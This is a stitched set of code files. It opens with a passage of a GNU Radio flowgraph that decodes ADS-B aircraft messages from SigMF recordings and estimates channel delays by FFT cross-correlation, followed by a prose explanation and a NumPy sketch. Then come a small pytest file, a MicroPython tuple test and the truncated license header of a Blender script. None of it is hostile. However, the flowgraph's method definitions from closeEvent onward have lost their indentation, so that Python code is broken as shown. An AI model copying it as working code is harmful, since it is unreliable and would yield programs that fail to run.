        self.blocks_multiply_conjugate_cc_0_0 = blocks.multiply_conjugate_cc(nfft)
        self.blocks_multiply_conjugate_cc_0 = blocks.multiply_conjugate_cc(nfft)
        self.blocks_max_xx_0_0_0 = blocks.max_ff(nfft, 1)
        self.blocks_max_xx_0_0 = blocks.max_ff(nfft, 1)
        self.blocks_max_xx_0 = blocks.max_ff(nfft, 1)
        self.blocks_delay_3 = blocks.delay(gr.sizeof_gr_complex*1, delay_3)
        self.blocks_delay_2 = blocks.delay(gr.sizeof_gr_complex*1, delay_2)
        self.blocks_delay_1 = blocks.delay(gr.sizeof_gr_complex*1, delay_1)
        self.blocks_delay_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_0)
        self.blocks_complex_to_mag_squared_1_0_0_0_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_1_0_0_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_1_0_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_1_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_1 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_0_1_2 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_0_1_1_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_0_1_1 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_0_1_0_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_0_1_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_0_1 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_0_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_squared_0 = blocks.complex_to_mag_squared(1)
        self.blocks_complex_to_mag_0_0_0 = blocks.complex_to_mag(nfft)
        self.blocks_complex_to_mag_0_0 = blocks.complex_to_mag(nfft)
        self.blocks_complex_to_mag_0 = blocks.complex_to_mag(nfft)
        self.blocks_argmax_xx_0_0_0 = blocks.argmax_fs(nfft)
        self.blocks_argmax_xx_0_0 = blocks.argmax_fs(nfft)
        self.blocks_argmax_xx_0 = blocks.argmax_fs(nfft)
        self.blocks_add_xx_0 = blocks.add_vcc(1)
        self.blocks_add_const_vxx_1_0_0 = blocks.add_const_vff((float(delay_3), ))
        self.blocks_add_const_vxx_1_0 = blocks.add_const_vff((float(delay_2), ))
        self.blocks_add_const_vxx_1 = blocks.add_const_vff((float(delay_1), ))
        self.blocks_add_const_vxx_0_0_0 = blocks.add_const_vff((-nfft / 2, ))
        self.blocks_add_const_vxx_0_0 = blocks.add_const_vff((-nfft / 2, ))
        self.blocks_add_const_vxx_0 = blocks.add_const_vff((-nfft / 2, ))
        self.analog_const_source_x_0_0_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
        self.analog_const_source_x_0_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
        self.analog_const_source_x_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
        self.analog_const_source_x_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
        self.analog_const_source_x_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
        self.analog_agc2_xx_0_3 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
        self.analog_agc2_xx_0_3.set_max_gain(65536)
        self.analog_agc2_xx_0_2 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
        self.analog_agc2_xx_0_2.set_max_gain(65536)
        self.analog_agc2_xx_0_1 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
        self.analog_agc2_xx_0_1.set_max_gain(65536)
        self.analog_agc2_xx_0 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
        self.analog_agc2_xx_0.set_max_gain(65536)
        self.adsb_framer_1_0_0_0_0 = adsb.framer(samp_rate, thresh)
        self.adsb_framer_1_0_0_0 = adsb.framer(samp_rate, thresh)
        self.adsb_framer_1_0_0 = adsb.framer(samp_rate, thresh)
        self.adsb_framer_1_0 = adsb.framer(samp_rate, thresh)
        self.adsb_framer_1 = adsb.framer(samp_rate, thresh)
        self.adsb_demod_0_0_0_0_0 = adsb.demod(samp_rate)
        self.adsb_demod_0_0_0_0 = adsb.demod(samp_rate)
        self.adsb_demod_0_0_0 = adsb.demod(samp_rate)
        self.adsb_demod_0_0 = adsb.demod(samp_rate)
        self.adsb_demod_0 = adsb.demod(samp_rate)
        self.adsb_decoder_0_0_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
        self.adsb_decoder_0_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
        self.adsb_decoder_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
        self.adsb_decoder_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
        self.adsb_decoder_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
        ##################################################
        # Connections
        ##################################################
        self.msg_connect((self.adsb_decoder_0, 'decoded'), (self.pyqt_meta_text_output_0, 'pdus'))
        self.msg_connect((self.adsb_decoder_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0, 'pdus'))
        self.msg_connect((self.adsb_decoder_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0, 'pdus'))
        self.msg_connect((self.adsb_decoder_0_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0_0, 'pdus'))
        self.msg_connect((self.adsb_decoder_0_0_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0_0_0, 'pdus'))
        self.msg_connect((self.adsb_demod_0, 'demodulated'), (self.adsb_decoder_0, 'demodulated'))
        self.msg_connect((self.adsb_demod_0_0, 'demodulated'), (self.adsb_decoder_0_0, 'demodulated'))
        self.msg_connect((self.adsb_demod_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0, 'demodulated'))
        self.msg_connect((self.adsb_demod_0_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0_0, 'demodulated'))
        self.msg_connect((self.adsb_demod_0_0_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0_0_0, 'demodulated'))
        self.connect((self.adsb_demod_0, 0), (self.qtgui_time_sink_x_0_1_0, 0))
        self.connect((self.adsb_demod_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0, 0))
        self.connect((self.adsb_demod_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0, 0))
        self.connect((self.adsb_demod_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0, 0))
        self.connect((self.adsb_demod_0_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0_0, 0))
        self.connect((self.adsb_framer_1, 0), (self.adsb_demod_0, 0))
        self.connect((self.adsb_framer_1_0, 0), (self.adsb_demod_0_0, 0))
        self.connect((self.adsb_framer_1_0_0, 0), (self.adsb_demod_0_0_0, 0))
        self.connect((self.adsb_framer_1_0_0_0, 0), (self.adsb_demod_0_0_0_0, 0))
        self.connect((self.adsb_framer_1_0_0_0_0, 0), (self.adsb_demod_0_0_0_0_0, 0))
        self.connect((self.analog_agc2_xx_0, 0), (self.blocks_complex_to_mag_squared_0, 0))
        self.connect((self.analog_agc2_xx_0, 0), (self.blocks_delay_0, 0))
        self.connect((self.analog_agc2_xx_0, 0), (self.qtgui_freq_sink_x_0, 0))
        self.connect((self.analog_agc2_xx_0, 0), (self.qtgui_waterfall_sink_x_0, 0))
        self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_complex_to_mag_squared_0_1, 0))
        self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_delay_1, 0))
        self.connect((self.analog_agc2_xx_0_1, 0), (self.qtgui_freq_sink_x_0_0, 0))
        self.connect((self.analog_agc2_xx_0_1, 0), (self.qtgui_waterfall_sink_x_0_0, 0))
        self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_complex_to_mag_squared_0_1_0, 0))
        self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_delay_2, 0))
        self.connect((self.analog_agc2_xx_0_2, 0), (self.qtgui_freq_sink_x_0_1, 0))
        self.connect((self.analog_agc2_xx_0_2, 0), (self.qtgui_waterfall_sink_x_0_0_0, 0))
        self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_complex_to_mag_squared_0_1_1, 0))
        self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_delay_3, 0))
        self.connect((self.analog_agc2_xx_0_3, 0), (self.qtgui_freq_sink_x_0_1_0, 0))
        self.connect((self.analog_agc2_xx_0_3, 0), (self.qtgui_waterfall_sink_x_0_0_1, 0))
        self.connect((self.analog_const_source_x_0, 0), (self.qtgui_time_sink_x_0_1_0, 1))
        self.connect((self.analog_const_source_x_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0, 1))
        self.connect((self.analog_const_source_x_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0, 1))
        self.connect((self.analog_const_source_x_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0, 1))
        self.connect((self.analog_const_source_x_0_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0_0, 1))
        self.connect((self.blocks_add_const_vxx_0, 0), (self.blocks_multiply_const_vxx_0, 0))
        self.connect((self.blocks_add_const_vxx_0_0, 0), (self.blocks_multiply_const_vxx_0_0, 0))
        self.connect((self.blocks_add_const_vxx_0_0_0, 0), (self.blocks_multiply_const_vxx_0_0_0, 0))
        self.connect((self.blocks_add_const_vxx_1, 0), (self.qtgui_number_sink_0, 0))
        self.connect((self.blocks_add_const_vxx_1_0, 0), (self.qtgui_number_sink_0, 1))
        self.connect((self.blocks_add_const_vxx_1_0_0, 0), (self.qtgui_number_sink_0, 2))
        self.connect((self.blocks_add_xx_0, 0), (self.blocks_complex_to_mag_squared_1_0_0_0_0, 0))
        self.connect((self.blocks_argmax_xx_0, 1), (self.blocks_null_sink_0, 0))
        self.connect((self.blocks_argmax_xx_0, 0), (self.blocks_short_to_float_0, 0))
        self.connect((self.blocks_argmax_xx_0_0, 1), (self.blocks_null_sink_0_0, 0))
        self.connect((self.blocks_argmax_xx_0_0, 0), (self.blocks_short_to_float_0_0, 0))
        self.connect((self.blocks_argmax_xx_0_0_0, 1), (self.blocks_null_sink_0_0_0, 0))
        self.connect((self.blocks_argmax_xx_0_0_0, 0), (self.blocks_short_to_float_0_0_0, 0))
        self.connect((self.blocks_complex_to_mag_0, 0), (self.single_pole_iir_filter_xx_0, 0))
        self.connect((self.blocks_complex_to_mag_0_0, 0), (self.single_pole_iir_filter_xx_0_0, 0))
        self.connect((self.blocks_complex_to_mag_0_0_0, 0), (self.single_pole_iir_filter_xx_0_0_0, 0))
        self.connect((self.blocks_complex_to_mag_squared_0, 0), (self.qtgui_time_sink_x_0, 0))
        self.connect((self.blocks_complex_to_mag_squared_0_0, 0), (self.qtgui_time_sink_x_0_1, 0))
        self.connect((self.blocks_complex_to_mag_squared_0_1, 0), (self.qtgui_time_sink_x_0_0, 0))
        self.connect((self.blocks_complex_to_mag_squared_0_1_0, 0), (self.qtgui_time_sink_x_0_0_0, 0))
        self.connect((self.blocks_complex_to_mag_squared_0_1_0_0, 0), (self.qtgui_time_sink_x_0_1, 2))
        self.connect((self.blocks_complex_to_mag_squared_0_1_1, 0), (self.qtgui_time_sink_x_0_0_1, 0))
        self.connect((self.blocks_complex_to_mag_squared_0_1_1_0, 0), (self.qtgui_time_sink_x_0_1, 3))
        self.connect((self.blocks_complex_to_mag_squared_0_1_2, 0), (self.qtgui_time_sink_x_0_1, 1))
        self.connect((self.blocks_complex_to_mag_squared_1, 0), (self.adsb_framer_1, 0))
        self.connect((self.blocks_complex_to_mag_squared_1_0, 0), (self.adsb_framer_1_0, 0))
        self.connect((self.blocks_complex_to_mag_squared_1_0_0, 0), (self.adsb_framer_1_0_0, 0))
        self.connect((self.blocks_complex_to_mag_squared_1_0_0_0, 0), (self.adsb_framer_1_0_0_0, 0))
        self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0, 0), (self.adsb_framer_1_0_0_0_0, 0))
        self.connect((self.blocks_delay_0, 0), (self.blocks_add_xx_0, 0))
        self.connect((self.blocks_delay_0, 0), (self.blocks_complex_to_mag_squared_0_0, 0))
        self.connect((self.blocks_delay_0, 0), (self.blocks_complex_to_mag_squared_1, 0))
        self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0, 0))
        self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0_1, 0))
        self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0_1_0, 0))
        self.connect((self.blocks_delay_1, 0), (self.blocks_add_xx_0, 1))
        self.connect((self.blocks_delay_1, 0), (self.blocks_complex_to_mag_squared_0_1_2, 0))
        self.connect((self.blocks_delay_1, 0), (self.blocks_complex_to_mag_squared_1_0, 0))
        self.connect((self.blocks_delay_1, 0), (self.blocks_stream_to_vector_0_0, 0))
        self.connect((self.blocks_delay_2, 0), (self.blocks_add_xx_0, 2))
        self.connect((self.blocks_delay_2, 0), (self.blocks_complex_to_mag_squared_0_1_0_0, 0))
        self.connect((self.blocks_delay_2, 0), (self.blocks_complex_to_mag_squared_1_0_0, 0))
        self.connect((self.blocks_delay_2, 0), (self.blocks_stream_to_vector_0_0_0, 0))
        self.connect((self.blocks_delay_3, 0), (self.blocks_add_xx_0, 3))
        self.connect((self.blocks_delay_3, 0), (self.blocks_complex_to_mag_squared_0_1_1_0, 0))
        self.connect((self.blocks_delay_3, 0), (self.blocks_complex_to_mag_squared_1_0_0_0, 0))
        self.connect((self.blocks_delay_3, 0), (self.blocks_stream_to_vector_0_0_0_0, 0))
        self.connect((self.blocks_max_xx_0, 0), (self.qtgui_time_sink_x_1, 0))
        self.connect((self.blocks_max_xx_0_0, 0), (self.qtgui_time_sink_x_1, 1))
        self.connect((self.blocks_max_xx_0_0_0, 0), (self.qtgui_time_sink_x_1, 2))
        self.connect((self.blocks_multiply_conjugate_cc_0, 0), (self.fft_vxx_0_0, 0))
        self.connect((self.blocks_multiply_conjugate_cc_0_0, 0), (self.fft_vxx_0_0_0, 0))
        self.connect((self.blocks_multiply_conjugate_cc_0_0_0, 0), (self.fft_vxx_0_0_0_0, 0))
        self.connect((self.blocks_multiply_const_vxx_0, 0), (self.blocks_add_const_vxx_1, 0))
        self.connect((self.blocks_multiply_const_vxx_0_0, 0), (self.blocks_add_const_vxx_1_0, 0))
        self.connect((self.blocks_multiply_const_vxx_0_0_0, 0), (self.blocks_add_const_vxx_1_0_0, 0))
        self.connect((self.blocks_short_to_float_0, 0), (self.blocks_add_const_vxx_0, 0))
        self.connect((self.blocks_short_to_float_0_0, 0), (self.blocks_add_const_vxx_0_0, 0))
        self.connect((self.blocks_short_to_float_0_0_0, 0), (self.blocks_add_const_vxx_0_0_0, 0))
        self.connect((self.blocks_skiphead_0, 0), (self.blocks_throttle_0, 0))
        self.connect((self.blocks_skiphead_1, 0), (self.blocks_throttle_1, 0))
        self.connect((self.blocks_skiphead_2, 0), (self.blocks_throttle_2, 0))
        self.connect((self.blocks_skiphead_3, 0), (self.blocks_throttle_3, 0))
        self.connect((self.blocks_stream_to_vector_0, 0), (self.fft_vxx_0, 0))
        self.connect((self.blocks_stream_to_vector_0_0, 0), (self.fft_vxx_1, 0))
        self.connect((self.blocks_stream_to_vector_0_0_0, 0), (self.fft_vxx_1_0, 0))
        self.connect((self.blocks_stream_to_vector_0_0_0_0, 0), (self.fft_vxx_1_0_0, 0))
        self.connect((self.blocks_stream_to_vector_0_1, 0), (self.fft_vxx_0_1, 0))
        self.connect((self.blocks_stream_to_vector_0_1_0, 0), (self.fft_vxx_0_1_0, 0))
        self.connect((self.blocks_throttle_0, 0), (self.analog_agc2_xx_0, 0))
        self.connect((self.blocks_throttle_1, 0), (self.analog_agc2_xx_0_1, 0))
        self.connect((self.blocks_throttle_2, 0), (self.analog_agc2_xx_0_2, 0))
        self.connect((self.blocks_throttle_3, 0), (self.analog_agc2_xx_0_3, 0))
        self.connect((self.fft_vxx_0, 0), (self.blocks_multiply_conjugate_cc_0, 0))
        self.connect((self.fft_vxx_0_0, 0), (self.blocks_complex_to_mag_0, 0))
        self.connect((self.fft_vxx_0_0_0, 0), (self.blocks_complex_to_mag_0_0, 0))
        self.connect((self.fft_vxx_0_0_0_0, 0), (self.blocks_complex_to_mag_0_0_0, 0))
        self.connect((self.fft_vxx_0_1, 0), (self.blocks_multiply_conjugate_cc_0_0, 0))
        self.connect((self.fft_vxx_0_1_0, 0), (self.blocks_multiply_conjugate_cc_0_0_0, 0))
        self.connect((self.fft_vxx_1, 0), (self.blocks_multiply_conjugate_cc_0, 1))
        self.connect((self.fft_vxx_1_0, 0), (self.blocks_multiply_conjugate_cc_0_0, 1))
        self.connect((self.fft_vxx_1_0_0, 0), (self.blocks_multiply_conjugate_cc_0_0_0, 1))
        self.connect((self.sigmf_source_0, 0), (self.blocks_skiphead_0, 0))
        self.connect((self.sigmf_source_1, 0), (self.blocks_skiphead_1, 0))
        self.connect((self.sigmf_source_2, 0), (self.blocks_skiphead_2, 0))
        self.connect((self.sigmf_source_3, 0), (self.blocks_skiphead_3, 0))
        self.connect((self.single_pole_iir_filter_xx_0, 0), (self.blocks_argmax_xx_0, 0))
        self.connect((self.single_pole_iir_filter_xx_0, 0), (self.blocks_max_xx_0, 0))
        self.connect((self.single_pole_iir_filter_xx_0, 0), (self.qtgui_vector_sink_f_0, 0))
        self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.blocks_argmax_xx_0_0, 0))
        self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.blocks_max_xx_0_0, 0))
        self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.qtgui_vector_sink_f_0, 1))
        self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.blocks_argmax_xx_0_0_0, 0))
        self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.blocks_max_xx_0_0_0, 0))
        self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.qtgui_vector_sink_f_0, 2))
def closeEvent(self, event):
self.settings = Qt.QSettings("GNU Radio", "kerberos_sigmf_playback3")
self.settings.setValue("geometry", self.saveGeometry())
event.accept()
def get_trig_delay(self):
return self.trig_delay
def set_trig_delay(self, trig_delay):
self.trig_delay = trig_delay
Qt.QMetaObject.invokeMethod(self._trig_delay_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.trig_delay)))
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
def get_trig_channel(self):
return self.trig_channel
def set_trig_channel(self, trig_channel):
self.trig_channel = trig_channel
self._trig_channel_callback(self.trig_channel)
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
def get_throttle(self):
return self.throttle
def set_throttle(self, throttle):
self.throttle = throttle
Qt.QMetaObject.invokeMethod(self._throttle_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.throttle)))
self.blocks_throttle_3.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_2.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_1.set_sample_rate(self.samp_rate /self.throttle)
self.blocks_throttle_0.set_sample_rate(self.samp_rate / self.throttle)
def get_thresh(self):
return self.thresh
def set_thresh(self, thresh):
self.thresh = thresh
Qt.QMetaObject.invokeMethod(self._thresh_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.thresh)))
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
self.qtgui_time_sink_x_0_0_1.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.analog_const_source_x_0_0_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0.set_offset(self.thresh)
self.analog_const_source_x_0.set_offset(self.thresh)
self.adsb_framer_1_0_0_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0.set_threshold(self.thresh)
self.adsb_framer_1.set_threshold(self.thresh)
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.qtgui_waterfall_sink_x_0_0_1.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0.set_frequency_range(0, self.samp_rate)
self.qtgui_time_sink_x_1.set_samp_rate(self.samp_rate / self.nfft)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_0_1.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_0_0.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_0.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0.set_samp_rate(self.samp_rate)
self.qtgui_freq_sink_x_0_1_0.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0_1.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0.set_frequency_range(0, self.samp_rate)
self.blocks_throttle_3.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_2.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_1.set_sample_rate(self.samp_rate /self.throttle)
self.blocks_throttle_0.set_sample_rate(self.samp_rate / self.throttle)
def get_nfft(self):
return self.nfft
def set_nfft(self, nfft):
self.nfft = nfft
self.qtgui_time_sink_x_1.set_samp_rate(self.samp_rate / self.nfft)
self.blocks_add_const_vxx_0_0_0.set_k((-self.nfft / 2, ))
self.blocks_add_const_vxx_0_0.set_k((-self.nfft / 2, ))
self.blocks_add_const_vxx_0.set_k((-self.nfft / 2, ))
def get_delay_3(self):
return self.delay_3
def set_delay_3(self, delay_3):
self.delay_3 = delay_3
Qt.QMetaObject.invokeMethod(self._delay_3_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_3)))
self.blocks_delay_3.set_dly(self.delay_3)
self.blocks_add_const_vxx_1_0_0.set_k((float(self.delay_3), ))
def get_delay_2(self):
return self.delay_2
def set_delay_2(self, delay_2):
self.delay_2 = delay_2
Qt.QMetaObject.invokeMethod(self._delay_2_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_2)))
self.blocks_delay_2.set_dly(self.delay_2)
self.blocks_add_const_vxx_1_0.set_k((float(self.delay_2), ))
def get_delay_1(self):
return self.delay_1
def set_delay_1(self, delay_1):
self.delay_1 = delay_1
Qt.QMetaObject.invokeMethod(self._delay_1_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_1)))
self.blocks_delay_1.set_dly(self.delay_1)
self.blocks_add_const_vxx_1.set_k((float(self.delay_1), ))
def get_delay_0(self):
return self.delay_0
def set_delay_0(self, delay_0):
self.delay_0 = delay_0
Qt.QMetaObject.invokeMethod(self._delay_0_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_0)))
self.blocks_delay_0.set_dly(self.delay_0)
def get_corr_alpha_0_3(self):
return self.corr_alpha_0_3
def set_corr_alpha_0_3(self, corr_alpha_0_3):
self.corr_alpha_0_3 = corr_alpha_0_3
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_3_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_3)))
self.single_pole_iir_filter_xx_0_0_0.set_taps(self.corr_alpha_0_3)
def get_corr_alpha_0_2(self):
return self.corr_alpha_0_2
def set_corr_alpha_0_2(self, corr_alpha_0_2):
self.corr_alpha_0_2 = corr_alpha_0_2
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_2_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_2)))
self.single_pole_iir_filter_xx_0_0.set_taps(self.corr_alpha_0_2)
def get_corr_alpha_0_1(self):
return self.corr_alpha_0_1
def set_corr_alpha_0_1(self, corr_alpha_0_1):
self.corr_alpha_0_1 = corr_alpha_0_1
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_1_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_1)))
self.single_pole_iir_filter_xx_0.set_taps(self.corr_alpha_0_1)
def main(top_block_cls=kerberos_sigmf_playback3, options=None):
from distutils.version import StrictVersion
if StrictVersion(Qt.qVersion()) >= StrictVersion("4.5.0"):
style = gr.prefs().get_string('qtgui', 'style', 'raster')
Qt.QApplication.setGraphicsSystem(style)
qapp = Qt.QApplication(sys.argv)
tb = top_block_cls()
tb.start()
tb.show()
def quitting():
tb.stop()
tb.wait()
qapp.connect(qapp, Qt.SIGNAL("aboutToQuit()"), quitting)
qapp.exec_()
if __name__ == '__main__':
main()
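The flowgraph above estimates inter-channel delay by frequency-domain cross-correlation: each pair of streams is FFT'd (`fft_vxx_*`), one spectrum is multiplied by the conjugate of the other (`blocks_multiply_conjugate_cc_*`), the smoothed magnitude is taken, and `blocks_argmax_xx_*` locates the peak. A minimal NumPy sketch of that technique outside GNU Radio (signal length, seed, and the 5-sample shift are illustrative choices, not values from the flowgraph):

```python
import numpy as np

def cross_correlate_fft(x, y):
    """Circular cross-correlation via the FFT: IFFT(FFT(x) * conj(FFT(y)))."""
    return np.fft.ifft(np.fft.fft(x) * np.conj(np.fft.fft(y)))

# Synthetic check: delay a noise reference by 5 samples and recover the lag
# from the correlation peak, as the flowgraph's argmax block does.
rng = np.random.default_rng(0)
ref = rng.standard_normal(256)
delayed = np.roll(ref, 5)
corr = np.abs(cross_correlate_fft(delayed, ref))
delay = int(np.argmax(corr))
print(delay)  # -> 5
```

In the flowgraph the same product of conjugated spectra feeds a single-pole IIR smoother before the argmax, which stabilises the peak across noisy captures.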

# File: src/raspberrypi_video_loop/tests/test_raspberrypi_video_loop.py
# Repo: linuxluigi/RaspberryPi_video_loop @ de2bef4 (MIT license)

import pytest
import raspberrypi_video_loop


def test_project_defines_author_and_version():
    assert hasattr(raspberrypi_video_loop, '__author__')
    assert hasattr(raspberrypi_video_loop, '__version__')
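The test only requires that the package's top-level module define `__author__` and `__version__`. A self-contained sketch of what satisfies it, with a `types.ModuleType` stand-in so it runs without the real package installed (both attribute values here are hypothetical):

```python
import types

# Stand-in for raspberrypi_video_loop/__init__.py, which would simply
# assign these two module-level attributes.
pkg = types.ModuleType("raspberrypi_video_loop")
pkg.__author__ = "example author"  # hypothetical value
pkg.__version__ = "0.1.0"          # hypothetical value

# The same checks the test performs:
assert hasattr(pkg, "__author__")
assert hasattr(pkg, "__version__")
```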

# File: tests/bytecode/mp-tests/tuple1.py
# Repo: LabAixBidouille/micropython @ 11aa6ba (MIT license)

x = ()
x = a
x = a,
x = a, 2
x = a, 2,
x = a, 2, 3
x = a, 2, 3, 4
x = a, 2, 3, 4, 5
x = ()
x = (a)
x = (a,)
x = (a, 2)
x = (a, 2,)
x = (a, 2, 3)
x = (a, 2, 3, 4)
x = (a, 2, 3, 4, 5)
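The assignments above exercise every tuple-display form the bytecode compiler must handle, with and without parentheses and trailing commas. The semantic rule they encode — commas create tuples, parentheses only group — can be checked directly (here `a` is bound to a concrete value, unlike in the test file, so the snippet runs standalone):

```python
a = 1  # bound here only so the checks can execute

assert (a) == 1 and not isinstance((a), tuple)   # parentheses alone: no tuple
assert (a,) == (1,) and isinstance((a,), tuple)  # trailing comma: a 1-tuple
assert (a, 2) == (a, 2,)                         # trailing comma is optional
assert () == tuple()                             # empty parens: the empty tuple
```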

# File: blender/2.79/scripts/startup/bl_operators/file.py
# Repo: uzairakbar/bpy2.79 @ 3a3e000 (MIT license)

# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
